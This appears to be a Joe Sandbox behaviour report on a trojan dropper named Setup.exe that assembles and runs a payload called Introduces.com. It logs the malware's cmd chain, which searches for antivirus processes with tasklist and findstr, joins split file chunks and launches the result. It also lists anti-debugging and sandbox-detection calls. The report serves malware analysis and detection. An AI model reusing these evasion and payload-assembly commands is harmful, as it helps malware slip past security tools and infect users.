Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A0D45D	10_2_00A0D45D
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A116B4	10_2_00A116B4
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_009FF6A0	10_2_009FF6A0
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A0F628	10_2_00A0F628
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_009F1663	10_2_009F1663
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A178C3	10_2_00A178C3
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A1DBA5	10_2_00A1DBA5
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A11BA8	10_2_00A11BA8
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A29CE5	10_2_00A29CE5
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A0DD28	10_2_00A0DD28
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A11FC0	10_2_00A11FC0
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A1BFD6	10_2_00A1BFD6

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\485687\Introduces.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: String function: 00A01A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: String function: 00A10D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: String function: 00A18B30 appears 42 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 004062CF appears 58 times

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@22/13@2/1

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A5A6AD GetLastError,FormatMessageW,

10_2_00A5A6AD

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A48DE9 AdjustTokenPrivileges,CloseHandle,		10_2_00A48DE9
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A49399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		10_2_00A49399

Source: C:\Users\user\Desktop\Setup.exe

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A54148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

10_2_00A54148

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A5443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

10_2_00A5443D

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03

Source: C:\Users\user\Desktop\Setup.exe

File created: C:\Users\user\AppData\Local\Temp\nszAD7.tmp

Jump to behavior

Source: Setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Setup.exe	ReversingLabs: Detection: 18%
Source: Setup.exe	Virustotal: Detection: 15%

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\user\Desktop\Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 485687
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ADDITIONALLYPURCHASEDNEWLYLAUNDRYASSISTSHELPLESWRIGHT" Permitted
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\College + ..\Shelter + ..\Defects + ..\Populations + ..\Alive + ..\Bus k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\485687\Introduces.com Introduces.com k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 485687	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ADDITIONALLYPURCHASEDNEWLYLAUNDRYASSISTSHELPLESWRIGHT" Permitted	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\College + ..\Shelter + ..\Defects + ..\Populations + ..\Alive + ..\Bus k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\485687\Introduces.com Introduces.com k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Setup.exe

Static file information: File size 73410092 > 1048576

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A18B75 push ecx; ret

10_2_00A18B88

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		10_2_00A759B3
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A05EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		10_2_00A05EDA

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A133B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_00A133B7

Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

API coverage: 4.1 %

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com TID: 7060

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A54005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00A54005
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00A5C2FF
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5494A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00A5494A
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_00A5CD9F
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5CD14 FindFirstFileW,FindClose,	10_2_00A5CD14
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00A5F5D8
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00A5F735
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A5FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00A5FA36
Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com	Code function: 10_2_00A53CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00A53CE2

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A05D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_00A05D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\485687	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\485687\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Introduces.com, 0000000A.00000002.2691878726.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Introduces.com, 0000000A.00000002.2691661811.0000000001314000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A645D5 BlockInput,

10_2_00A645D5

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00A05240

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A25CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

10_2_00A25CAC

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Users\user\AppData\Local\Temp\485687\Introduces.com

Code function: 10_2_00A488CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

10_2_00A488CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

